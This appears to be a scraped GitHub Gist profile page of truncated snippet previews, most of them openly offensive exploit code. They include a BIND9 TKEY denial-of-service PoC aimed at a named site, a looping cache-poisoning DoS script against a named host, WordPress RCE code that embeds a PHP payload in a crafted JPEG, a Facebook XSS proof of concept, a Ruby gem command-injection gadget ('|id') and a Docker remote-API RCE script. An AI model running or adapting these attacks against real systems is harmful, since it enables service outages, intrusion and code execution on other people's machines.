Skip to content

Instantly share code, notes, and snippets.

View andripwn's full-sized avatar
☺️
Taking it easy

mickeybrew andripwn

☺️
Taking it easy
View GitHub Profile
@andripwn
andripwn / poc.py
Created April 7, 2020 03:37
DoS of (smartsupp.com) via CVE-2015-5477 exploitation
#!/usr/bin/env python
import socket
import sys
print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' [target]')
sys.exit(1)
@andripwn
andripwn / smuggling.jar
Created March 24, 2020 16:49
P-LOAD HTTP Request Smuggling
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
import re
def queueRequests(target, wordlists):
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
@andripwn
andripwn / Cache-poisoning.sh
Last active September 26, 2020 17:14
Cache poisoning DoS to various aa-assets (#High Vulnerability)
#!/bin/bash
while true
do
printf 'GET /?cb=xxx HTTP/1.1\r\n'\
'Host: blanco-dev.eu2.frbit.net\r\n'\
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n'\
'Accept: */*\r\n'\
'Accept-Language: en-US,en;q=0.5\r\n'\
'Accept-Encoding: gzip, deflate\r\n'\
#!/bin/bash
#
# script for subdomain enumeration using 4 of the best tools with some APIs:
# * findomain: https://github.com/Edu4rdSHL/findomain
# * SubFinder: https://github.com/projectdiscovery/subfinder
# * Amass: https://github.com/OWASP/Amass
# * AssetFinder: https://github.com/tomnomnom/assetfinder
#
bold="\e[1m"
@andripwn
andripwn / wordpress-rce.js
Created March 16, 2020 15:53
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
@andripwn
andripwn / fb-xss-poc.html
Created March 12, 2020 17:03
iPhone app XSS in Facebook Mail
<script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
<script type="text/javascript">
// http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
$(function(){
parse_messages = function()
{
$('.twoLines.preview>.snippet').each(function(index,value)
{
lines = value.innerHTML.replace(/(<([^>]+)>)/ig,'');
@andripwn
andripwn / OTP.rb
Last active March 5, 2020 17:55
Universal OTP
#!/usr/bin/env ruby
class Gem::StubSpecification
def initialize; end
end
stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
@andripwn
andripwn / crawler.py
Created February 27, 2020 17:03
Tesla Clawler
import argparse
import requests
import logging
import pandas as pd
import time
logging.basicConfig()
logger = logging.getLogger('tesla-crawler')
logger.setLevel(logging.INFO)
@andripwn
andripwn / docker.py
Created February 26, 2020 16:08
console-put-rce
from __future__ import print_function
import requests
import logging
import json
import urllib.parse
# NOTE
# Enable Remote API with the following command
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
# This is an intended feature, remember to filter the port 2375..
#!/bin/bash
# colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
RESET='\033[0m'
# install homebrew
echo -e "[-] ${GREEN}install homebrew...${RESET}"